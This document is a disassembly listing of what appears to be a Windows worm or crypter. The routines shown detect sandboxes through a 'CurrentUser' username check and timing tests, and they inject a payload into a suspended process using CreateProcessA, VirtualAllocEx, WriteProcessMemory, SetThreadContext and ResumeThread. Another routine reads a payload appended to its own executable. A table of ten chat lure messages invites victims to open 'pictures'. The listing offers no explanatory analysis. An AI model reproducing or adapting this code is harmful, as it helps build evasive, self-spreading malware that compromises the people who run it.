; DATA XREF: sub_400173FC+18F�o
dword_40017800 dd 170B193Ch, 1327121Ch, 1D0C1704h, 1413h, 0FFFFFFFFh
; DATA XREF: sub_400173FC+1AD�o
dd 0Ch
dword_40017818 dd 140E0121h, 1B001723h, 8140400h, 0 dd 0FFFFFFFFh, 0Ch
dword_40017830 dd 1B0C0121h, 1B001723h, 8140400h, 0 dd 0FFFFFFFFh, 0Bh
dword_40017848 dd 0A0B1F2Ah, 110183Ch, 0F0715h, 0FFFFFFFFh, 0Ch
; DATA XREF: sub_400173FC+207�o
dword_4001785C dd 150A1C2Bh, 1B001723h, 8140400h, 0 dd 0FFFFFFFFh, 12h
dword_40017874 dd 21C0624h, 150B2812h, 0E1918h, 181B1039h, 0Ah, 0FFFFFFFFh
; DATA XREF: sub_400173FC+243�o
dd 0Eh
dword_40017890 dd 6031939h, 37191506h, 0C16141Bh, 1000935h, 0FFFFFFFFh
; DATA XREF: sub_400173FC+261�o
dd 12h
dword_400178A8 dd 3B011134h, 160C1C18h, 1F143A1Eh, 1A173B11h, 381Dh
; DATA XREF: sub_400173FC+27F�o
; =============== S U B R O U T I N E =======================================
sub_400178BC proc near ; CODE XREF: sub_400178DC+53�p
; sub_40017A1C+F3�p ...
push ebx
mov ebx, edx
mov ecx, eax
mov eax, ecx
xor edx, edx
div ebx
test edx, edx
jnz short loc_400178CF
mov eax, ecx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_400178CF: ; CODE XREF: sub_400178BC+D�j
mov eax, ecx
xor edx, edx
div ebx
inc eax
imul ebx
pop ebx
retn
sub_400178BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400178DC proc near ; CODE XREF: sub_40017A1C+7B�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ecx, [eax+3Ch]
add ecx, eax
mov ebp, [ecx+38h]
mov ebx, [ecx+54h]
mov eax, ebx
xor edx, edx
div ebp
test edx, edx
jnz short loc_400178FB
mov [esp+14h+var_14], ebx
jmp short loc_40017907
; ---------------------------------------------------------------------------
loc_400178FB: ; CODE XREF: sub_400178DC+18�j
mov eax, ebx
xor edx, edx
div ebp
inc eax
add eax, ebp
mov [esp+14h+var_14], eax
loc_40017907: ; CODE XREF: sub_400178DC+1D�j
lea edi, [ecx+18h]
movzx eax, word ptr [ecx+14h]
add edi, eax
movzx esi, word ptr [ecx+6]
dec esi
test esi, esi
jb short loc_4001793B
inc esi
xor ebx, ebx
loc_4001791C: ; CODE XREF: sub_400178DC+5D�j
lea eax, [ebx+ebx*4]
cmp dword ptr [edi+eax*8+8], 0
jz short loc_40017937
lea eax, [ebx+ebx*4]
mov eax, [edi+eax*8+8]
mov edx, ebp
call sub_400178BC
add [esp+14h+var_14], eax
loc_40017937: ; CODE XREF: sub_400178DC+48�j
inc ebx
dec esi
jnz short loc_4001791C
loc_4001793B: ; CODE XREF: sub_400178DC+3B�j
mov eax, [esp+14h+var_14]
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_400178DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40017944 proc near ; CODE XREF: sub_40017A1C+3C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
xor eax, eax
mov [ebp+var_8], eax
xor eax, eax
push ebp
push offset loc_400179AF
push dword ptr fs:[eax]
mov fs:[eax], esp
xor ebx, ebx
mov eax, 40h
call sub_40002C20
mov esi, eax
mov [ebp+var_4], 40h
lea eax, [ebp+var_4]
push eax
push esi
call sub_400064B8 ; GetUserNameA
lea eax, [ebp+var_8]
mov edx, esi
call sub_40004A7C
mov eax, [ebp+var_8]
mov edx, offset aCurrentuser ; "CurrentUser"
call sub_40004C94
jnz short loc_40017999
mov bl, 1
loc_40017999: ; CODE XREF: sub_40017944+51�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400179B6
loc_400179A6: ; CODE XREF: sub_40017944+70�j
lea eax, [ebp+var_8]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_400179AF: ; DATA XREF: sub_40017944+10�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400179A6
; ---------------------------------------------------------------------------
loc_400179B6: ; CODE XREF: sub_40017944+6A�j
; DATA XREF: sub_40017944+5D�o
mov eax, ebx
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_40017944 endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 0Bh
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_40017944+47�o
; =============== S U B R O U T I N E =======================================
sub_400179D4 proc near ; CODE XREF: sub_40017A1C+41�p
; sub_40017A1C:loc_40017C5B�p ...
push ebx
push esi
push edi
xor ebx, ebx
call sub_400065D0 ; GetTickCount
mov edi, eax
push 1F4h
call sub_40006640 ; Sleep
call sub_400065D0 ; GetTickCount
mov esi, eax
push 1F4h
call sub_40006640 ; Sleep
call sub_400065D0 ; GetTickCount
sub esi, edi
cmp esi, 1F4h
jge short loc_40017A15
sub eax, edi
cmp eax, 3E8h
jge short loc_40017A15
mov bl, 1
loc_40017A15: ; CODE XREF: sub_400179D4+34�j
; sub_400179D4+3D�j
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_400179D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40017A1C proc near ; CODE XREF: .itext:40019849�p
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_1A4 = dword ptr -1A4h
var_198 = dword ptr -198h
var_179 = byte ptr -179h
var_74 = byte ptr -74h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFDACh
push ebx
push esi
push edi
xor ecx, ecx
mov [ebp+var_254], ecx
mov [ebp+var_24C], ecx
mov [ebp+var_250], ecx
mov [ebp+var_4], edx
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40017D6A
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_40017944
call sub_400179D4
lea eax, [ebp+var_179]
xor ecx, ecx
mov edx, 104h
call sub_40003580
push 104h
lea eax, [ebp+var_179]
push eax
push 0
call ds:dword_4001F3AC ; GetModuleFileNameA
mov eax, [ebp+var_8]
mov eax, [eax+3Ch]
add eax, [ebp+var_8]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
call sub_400178DC
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
call sub_40002C20
mov [ebp+var_14], eax
xor edx, edx
push ebp
push offset loc_40017D3D
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
mov eax, [ebp+var_10]
mov eax, [eax+54h]
mov edx, [ebp+var_10]
lea esi, [edx+18h]
mov edx, [ebp+var_10]
movzx edx, word ptr [edx+14h]
add esi, edx
mov edx, [ebp+var_10]
movzx edi, word ptr [edx+6]
dec edi
test edi, edi
jb short loc_40017AF6
inc edi
xor ebx, ebx
loc_40017AE2: ; CODE XREF: sub_40017A1C+D8�j
lea edx, [ebx+ebx*4]
cmp eax, [esi+edx*8+14h]
jbe short loc_40017AF2
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+14h]
loc_40017AF2: ; CODE XREF: sub_40017A1C+CD�j
inc ebx
dec edi
jnz short loc_40017AE2
loc_40017AF6: ; CODE XREF: sub_40017A1C+C1�j
mov ecx, eax
mov edx, [ebp+var_8]
mov eax, [ebp+var_C]
call sub_40006750
mov eax, [ebp+var_10]
mov edx, [eax+38h]
mov eax, [ebp+var_10]
mov eax, [eax+54h]
call sub_400178BC
add eax, [ebp+var_C]
mov [ebp+var_C], eax
mov eax, [ebp+var_10]
movzx edi, word ptr [eax+6]
dec edi
test edi, edi
jb short loc_40017B98
inc edi
xor ebx, ebx
loc_40017B29: ; CODE XREF: sub_40017A1C+17A�j
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+10h]
test eax, eax
jbe short loc_40017B72
lea edx, [ebx+ebx*4]
cmp eax, [esi+edx*8+8]
jbe short loc_40017B44
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
loc_40017B44: ; CODE XREF: sub_40017A1C+11F�j
lea edx, [ebx+ebx*4]
mov edx, [esi+edx*8+14h]
add edx, [ebp+var_8]
mov ecx, eax
mov eax, [ebp+var_C]
call sub_40006750
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
mov edx, [ebp+var_10]
mov edx, [edx+38h]
call sub_400178BC
add eax, [ebp+var_C]
mov [ebp+var_C], eax
jmp short loc_40017B94
; ---------------------------------------------------------------------------
loc_40017B72: ; CODE XREF: sub_40017A1C+116�j
lea eax, [ebx+ebx*4]
cmp dword ptr [esi+eax*8+8], 0
jz short loc_40017B94
lea eax, [ebx+ebx*4]
mov eax, [esi+eax*8+8]
mov edx, [ebp+var_10]
mov edx, [edx+38h]
call sub_400178BC
add eax, [ebp+var_C]
mov [ebp+var_C], eax
loc_40017B94: ; CODE XREF: sub_40017A1C+154�j
; sub_40017A1C+15E�j
inc ebx
dec edi
jnz short loc_40017B29
loc_40017B98: ; CODE XREF: sub_40017A1C+108�j
lea eax, [ebp+var_74]
xor ecx, ecx
mov edx, 44h
call sub_40003580
lea eax, [ebp+var_248]
xor ecx, ecx
mov edx, 0CCh
call sub_40003580
cmp [ebp+var_4], 0
jz short loc_40017C1D
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_74]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
lea eax, [ebp+var_250]
lea edx, [ebp+var_179]
mov ecx, 105h
call sub_40004AF4
push [ebp+var_250]
push offset dword_40017D80
push [ebp+var_4]
lea eax, [ebp+var_24C]
mov edx, 3
call sub_40004C08
mov eax, [ebp+var_24C]
call sub_40004D48
push eax
push 0
call ds:dword_4001F38C ; CreateProcessA
jmp short loc_40017C5B
; ---------------------------------------------------------------------------
loc_40017C1D: ; CODE XREF: sub_40017A1C+1A1�j
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_74]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
lea eax, [ebp+var_254]
lea edx, [ebp+var_179]
mov ecx, 105h
call sub_40004AF4
mov eax, [ebp+var_254]
call sub_40004D48
push eax
push 0
call ds:dword_4001F38C ; CreateProcessA
loc_40017C5B: ; CODE XREF: sub_40017A1C+1FF�j
call sub_400179D4
mov [ebp+var_248], 10007h
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+var_2C]
push eax
call ds:dword_4001F388 ; GetThreadContext
lea eax, [ebp+var_1C]
push eax
push 4
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+var_1A4]
add eax, 8
push eax
mov eax, [ebp+var_30]
push eax
call ds:dword_4001F384 ; ReadProcessMemory
push 40h
push 3000h
mov eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_30]
push eax
call ds:dword_4001F380 ; VirtualAllocEx
lea eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_20]
push eax
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_10]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_30]
push eax
call ds:dword_4001F3A8 ; WriteProcessMemory
lea eax, [ebp+var_1C]
push eax
push 4
mov eax, [ebp+var_10]
add eax, 34h
push eax
mov eax, [ebp+var_1A4]
add eax, 8
push eax
mov eax, [ebp+var_30]
push eax
call ds:dword_4001F3A8 ; WriteProcessMemory
mov eax, [ebp+var_10]
mov eax, [eax+34h]
mov edx, [ebp+var_10]
add eax, [edx+28h]
mov [ebp+var_198], eax
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+var_2C]
push eax
call ds:dword_4001F37C ; SetThreadContext
mov eax, [ebp+var_2C]
push eax
call ds:dword_4001F378 ; ResumeThread
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40017D44
loc_40017D2D: ; CODE XREF: sub_40017A1C+326�j
call sub_400179D4
mov eax, [ebp+var_14]
push eax
call sub_400062D8
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40017D3D: ; DATA XREF: sub_40017A1C+91�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40017D2D
; ---------------------------------------------------------------------------
loc_40017D44: ; CODE XREF: sub_40017A1C+320�j
; DATA XREF: sub_40017A1C+30C�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40017D71
loc_40017D51: ; CODE XREF: sub_40017A1C+353�j
lea eax, [ebp+var_254]
mov edx, 3
call sub_400048A8
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40017D6A: ; DATA XREF: sub_40017A1C+31�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40017D51
; ---------------------------------------------------------------------------
loc_40017D71: ; CODE XREF: sub_40017A1C+34D�j
; DATA XREF: sub_40017A1C+330�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40017A1C endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 1
dword_40017D80 dd 20h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40017D84 proc near ; CODE XREF: .itext:400199CC�p
var_174 = byte ptr -174h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_14C = byte ptr -14Ch
var_146 = word ptr -146h
var_54 = byte ptr -54h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFE8Ch
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40017F00
push dword ptr fs:[eax]
mov fs:[eax], esp
xor ebx, ebx
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+var_4]
call sub_40004D48
push eax
call ds:dword_4001F3B4 ; CreateFileA
mov esi, eax
push 0
push 0
push 0
push esi
call ds:dword_4001F3B8 ; SetFilePointer
push 0
lea eax, [ebp+var_10]
push eax
push 40h
lea eax, [ebp+var_54]
push eax
push esi
call ds:dword_4001F3BC ; ReadFile
cmp [ebp+var_10], 40h
jnz loc_40017EE3
push 0
push 0
mov eax, [ebp+var_18]
push eax
push esi
call ds:dword_4001F3B8 ; SetFilePointer
push 0
lea eax, [ebp+var_10]
push eax
push 0F8h
lea eax, [ebp+var_14C]
push eax
push esi
call ds:dword_4001F3BC ; ReadFile
cmp [ebp+var_10], 0F8h
jnz loc_40017EDA
push 1
push 0
movzx eax, [ebp+var_146]
dec eax
add eax, eax
add eax, eax
add eax, eax
lea eax, [eax+eax*4]
push eax
push esi
call ds:dword_4001F3B8 ; SetFilePointer
push 0
lea eax, [ebp+var_10]
push eax
push 28h
lea eax, [ebp+var_174]
push eax
push esi
call ds:dword_4001F3BC ; ReadFile
mov eax, [ebp+var_160]
add eax, [ebp+var_164]
mov [ebp+var_14], eax
push 0
push esi
call ds:dword_4001F3C0 ; GetFileSize
mov edi, eax
sub edi, [ebp+var_14]
test edi, edi
jbe short loc_40017ED1
push 0
push 0
mov eax, [ebp+var_14]
push eax
push esi
call ds:dword_4001F3B8 ; SetFilePointer
mov eax, edi
call sub_40002C20
mov edx, [ebp+var_8]
mov [edx], eax
push 0
lea eax, [ebp+var_10]
push eax
push edi
mov eax, [ebp+var_8]
mov eax, [eax]
push eax
push esi
call ds:dword_4001F3BC ; ReadFile
cmp edi, [ebp+var_10]
jnz short loc_40017EC8
mov bl, 1
mov eax, [ebp+var_C]
mov [eax], edi
push esi
call ds:dword_4001F3C4 ; CloseHandle
jmp short loc_40017EEA
; ---------------------------------------------------------------------------
loc_40017EC8: ; CODE XREF: sub_40017D84+132�j
push esi
call ds:dword_4001F3C4 ; CloseHandle
jmp short loc_40017EEA
; ---------------------------------------------------------------------------
loc_40017ED1: ; CODE XREF: sub_40017D84+FE�j
push esi
call ds:dword_4001F3C4 ; CloseHandle
jmp short loc_40017EEA
; ---------------------------------------------------------------------------
loc_40017EDA: ; CODE XREF: sub_40017D84+A6�j
push esi
call ds:dword_4001F3C4 ; CloseHandle
jmp short loc_40017EEA
; ---------------------------------------------------------------------------
loc_40017EE3: ; CODE XREF: sub_40017D84+71�j
push esi
call ds:dword_4001F3C4 ; CloseHandle
loc_40017EEA: ; CODE XREF: sub_40017D84+142�j
; sub_40017D84+14B�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40017F07
loc_40017EF7: ; CODE XREF: sub_40017D84+181�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40017F00: ; DATA XREF: sub_40017D84+20�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40017EF7
; ---------------------------------------------------------------------------
loc_40017F07: ; CODE XREF: sub_40017D84+17B�j
; DATA XREF: sub_40017D84+16E�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40017D84 endp
; =============== S U B R O U T I N E =======================================
sub_40017F10 proc near ; CODE XREF: .itext:4001941E�p
push ebx
mov ebx, eax
call sub_40003058
mov eax, 9
call sub_40003080
mov ds:dword_4001F6E0, eax
mov eax, ds:dword_4001F6E0
cmp eax, 9 ; switch 10 cases
ja loc_40017FEE ; default
jmp ds:off_40017F3C[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_40017F3C dd offset loc_40017F64 ; DATA XREF: sub_40017F10+25�r
dd offset loc_40017F72 ; jump table for switch statement
dd offset loc_40017F80
dd offset loc_40017F8E
dd offset loc_40017F9C
dd offset loc_40017FAA
dd offset loc_40017FB8
dd offset loc_40017FC6
dd offset loc_40017FD4
dd offset loc_40017FE2
; ---------------------------------------------------------------------------
loc_40017F64: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 0
mov edx, offset aHahaLookAtThis ; "haha, look at this Wallpaper :D its gre"...
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017F72: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 1
mov edx, offset aLookAtThisNewG ; "Look at this new game... :D, Look at my"...
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017F80: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 2
mov edx, offset aLookiMyNewHair ; "Looki ^^, my new hair style what you th"...
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017F8E: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 3
mov edx, offset aWonnaSeeARealE ; "Wonna see a real evil pic? :D mwahaha B"...
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017F9C: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 4
mov edx, offset aNowThisIsWhatI ; "Now this is what i call Pure Ownage..."
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017FAA: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 5
mov edx, offset aIFinallyGotANe ; "I finally got a new car, what you think"...
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017FB8: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 6
mov edx, offset aOoooTellMeIfYo ; "oooo Tell me if you like my new compute"...
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017FC6: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 7
mov edx, offset aTellMeIfThisLo ; "Tell me if this looks coo, i made my ow"...
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017FD4: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 8
mov edx, offset aIWentToAPartyL ; "I went to a party last night, i got so "...
call sub_400048D8
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40017FE2: ; CODE XREF: sub_40017F10+25�j
; DATA XREF: sub_40017F10:off_40017F3C�o
mov eax, ebx ; jumptable 40017F35 case 9
mov edx, offset aYouGotoSeeThis ; "You goto see this pic, its brilliant ^_"...
call sub_400048D8
loc_40017FEE: ; CODE XREF: sub_40017F10+1F�j
pop ebx ; default
retn
sub_40017F10 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 29h
aHahaLookAtThis db 'haha, look at this Wallpaper :D its great',0
; DATA XREF: sub_40017F10+56�o
align 4
dd 0FFFFFFFFh, 38h
aLookAtThisNewG db 'Look at this new game... :D, Look at my kills :P Ownage?',0
; DATA XREF: sub_40017F10+64�o
align 4
dd 0FFFFFFFFh, 2Bh
aLookiMyNewHair db 'Looki ^^, my new hair style what you think?',0
; DATA XREF: sub_40017F10+72�o
dd 0FFFFFFFFh, 40h
aWonnaSeeARealE db 'Wonna see a real evil pic? :D mwahaha Bin-Ladin in a Blender ^_^',0
; DATA XREF: sub_40017F10+80�o
align 4
dd 0FFFFFFFFh, 26h
aNowThisIsWhatI db 'Now this is what i call Pure Ownage...',0 ; DATA XREF: sub_40017F10+8E�o
align 4
dd 0FFFFFFFFh, 28h
aIFinallyGotANe db 'I finally got a new car, what you think?',0
; DATA XREF: sub_40017F10+9C�o
align 4
dd 0FFFFFFFFh, 41h
aOoooTellMeIfYo db 'oooo Tell me if you like my new computer :) taken me ages to make'
; DATA XREF: sub_40017F10+AA�o
db 0
align 4
dd 0FFFFFFFFh, 5Ch
aTellMeIfThisLo db 'Tell me if this looks coo, i made my own Skin for Windows :), All'
; DATA XREF: sub_40017F10+B8�o
db ' blue and grey and stuff ^^',0
align 10h
dd 0FFFFFFFFh, 70h
aIWentToAPartyL db 'I went to a party last night, i got so wasted, hehe, here is a pi'
; DATA XREF: sub_40017F10+C6�o
db 'c of me trying to do that Cloth trick on tables',0
align 4
dd 0FFFFFFFFh, 28h
aYouGotoSeeThis db 'You goto see this pic, its brilliant ^_^',0
; DATA XREF: sub_40017F10+D4�o
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400182B0 proc near ; DATA XREF: .text:400183E8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40018301
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, offset dword_40023C68
call sub_40006204
mov eax, offset dword_40023C6C
call sub_40006204
mov eax, offset dword_40023C70
call sub_40006204
mov eax, offset dword_40023C74
call sub_40006204
mov eax, offset dword_40023C78
call sub_40004884
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40018308
loc_40018300: ; CODE XREF: sub_400182B0+56�j
retn
; ---------------------------------------------------------------------------
loc_40018301: ; DATA XREF: sub_400182B0+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40018300
; ---------------------------------------------------------------------------
loc_40018308: ; CODE XREF: sub_400182B0:loc_40018300�j
; DATA XREF: sub_400182B0+4B�o
pop ebp
retn
sub_400182B0 endp
; ---------------------------------------------------------------------------
align 4
dword_4001830C dd 1Bh ; .bss:off_4001E7D0�o
dd offset dword_40018314
dword_40018314 dd 2 dup(0) dd offset loc_40019000
dd offset sub_40006350
dd 2 dup(0)
dd offset loc_40019098
dd offset sub_40006758
dd 0Eh dup(0)
dd offset sub_400190AC
dd offset sub_4000CC50
dd offset loc_40019133+1
dd offset sub_4000D598
dd offset sub_40019144
dd offset sub_40012E54
dd 2 dup(0)
dd offset loc_400191F0
dd offset sub_40012F38
dd offset sub_400191F8
dd offset sub_40013ED4
dd offset loc_4001928C
dd offset sub_40013FA4
dd offset loc_40019294
dd offset sub_40014740
dd 2 dup(0)
dd offset byte_4001929C
dd offset sub_40015C34
dd 4 dup(0)
dd offset loc_40019398
dd offset sub_40016AB0
dd 5 dup(0)
dd offset sub_400182B0
dd 5 dup(?)
_text ends
; ---------------------------------------------------------------------------
; Section 2. (virtual address 00019000)
; Virtual size : 00000BFC ( 3068.)
; Section size in file : 00000BFC ( 3068.)
; Offset to raw data for section: 00019000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_itext segment para public 'CODE' use32
assume cs:_itext
;org 40019000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
loc_40019000: ; DATA XREF: .text:4001831C�o
sub ds:dword_4001C5B8, 1
jnb locret_40019094
call sub_400029FC
mov byte_4001A00C, 2
mov ds:off_4001C014, offset sub_40001168
mov ds:off_4001C018, offset sub_40001178
mov ds:byte_4001C04E, 2
mov ds:off_4001C000, offset sub_40005694
call sub_40003B64
test al, al
jz short loc_4001904C
call sub_40003B94
loc_4001904C: ; CODE XREF: .itext:40019045�j
call sub_40003C58
mov ds:word_4001C054, 0D7B0h
mov ds:word_4001C220, 0D7B0h
mov ds:word_4001C3EC, 0D7B0h
call sub_400011D0 ; GetCommandLineA
mov ds:dword_4001C040, eax
call sub_400012A0
mov ds:dword_4001C03C, eax
call sub_40006348 ; GetACP
mov ds:dword_4001C5BC, eax
call sub_40001288 ; GetCurrentThreadId
mov ds:dword_4001C034, eax
locret_40019094: ; CODE XREF: .itext:40019007�j
retn
; ---------------------------------------------------------------------------
align 4
loc_40019098: ; DATA XREF: .text:4001832C�o
sub ds:dword_4001E800, 1
jnb short locret_400190A8
xor eax, eax
mov ds:dword_4001E804, eax
locret_400190A8: ; CODE XREF: .itext:4001909F�j
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400190AC proc near ; DATA XREF: .text:4001836C�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4001911E
push dword ptr fs:[eax]
mov fs:[eax], esp
sub ds:dword_4001E918, 1
jnb short loc_40019110
mov eax, offset dword_4000C980
call sub_40004624
mov eax, offset dword_4000CA6C
call sub_4000464C
cmp ds:byte_4001E7F5, 0
jz short loc_400190F2
mov eax, offset off_4001A84C
mov edx, offset loc_40019130
call sub_400048D8
loc_400190F2: ; CODE XREF: sub_400190AC+35�j
call sub_4000B72C
mov eax, offset sub_4000C230
call sub_400060A4
call sub_4000B830
call sub_4000C4D8
call sub_4000BE64
loc_40019110: ; CODE XREF: sub_400190AC+18�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40019125
loc_4001911D: ; CODE XREF: sub_400190AC+77�j
retn
; ---------------------------------------------------------------------------
loc_4001911E: ; DATA XREF: sub_400190AC+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001911D
; ---------------------------------------------------------------------------
loc_40019125: ; CODE XREF: sub_400190AC:loc_4001911D�j
; DATA XREF: sub_400190AC+6C�o
pop ebp
retn
sub_400190AC endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 2
; ---------------------------------------------------------------------------
loc_40019130: ; DATA XREF: sub_400190AC+3C�o
xor [eax+0], bh
loc_40019133: ; DATA XREF: .text:40018374�o
add [ebx+1F2802Dh], al
inc eax
add [ebx+5], esi
call sub_4000D28C
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40019144 proc near ; DATA XREF: .text:4001837C�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_400191E5
push dword ptr fs:[eax]
mov fs:[eax], esp
sub ds:dword_4001F2A4, 1
jnb short loc_400191D7
mov eax, offset dword_4001F284
call sub_40012AC4
mov eax, offset sub_4000E0EC
mov ds:off_4001F294, eax
mov eax, offset sub_4000DC90
mov ds:off_4001F298, eax
mov edx, offset sub_4000DBA0
mov ds:off_4001F29C, edx
mov ds:off_4001F2A0, eax
mov eax, offset sub_4000E3EC
mov edx, off_4001AFD0
mov [edx], eax
mov eax, offset sub_400127B8
mov edx, off_4001AEE4
mov [edx], eax
mov eax, offset sub_4000E700
mov edx, off_4001B018
mov [edx], eax
mov eax, offset sub_400116DC
mov edx, off_4001B0B4
mov [edx], eax
mov eax, offset sub_40011DFC
mov edx, off_4001B024
mov [edx], eax
push offset dword_4001F2AC
call sub_400065E0 ; InitializeCriticalSection
loc_400191D7: ; CODE XREF: sub_40019144+18�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400191EC
loc_400191E4: ; CODE XREF: sub_40019144+A6�j
retn
; ---------------------------------------------------------------------------
loc_400191E5: ; DATA XREF: sub_40019144+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400191E4
; ---------------------------------------------------------------------------
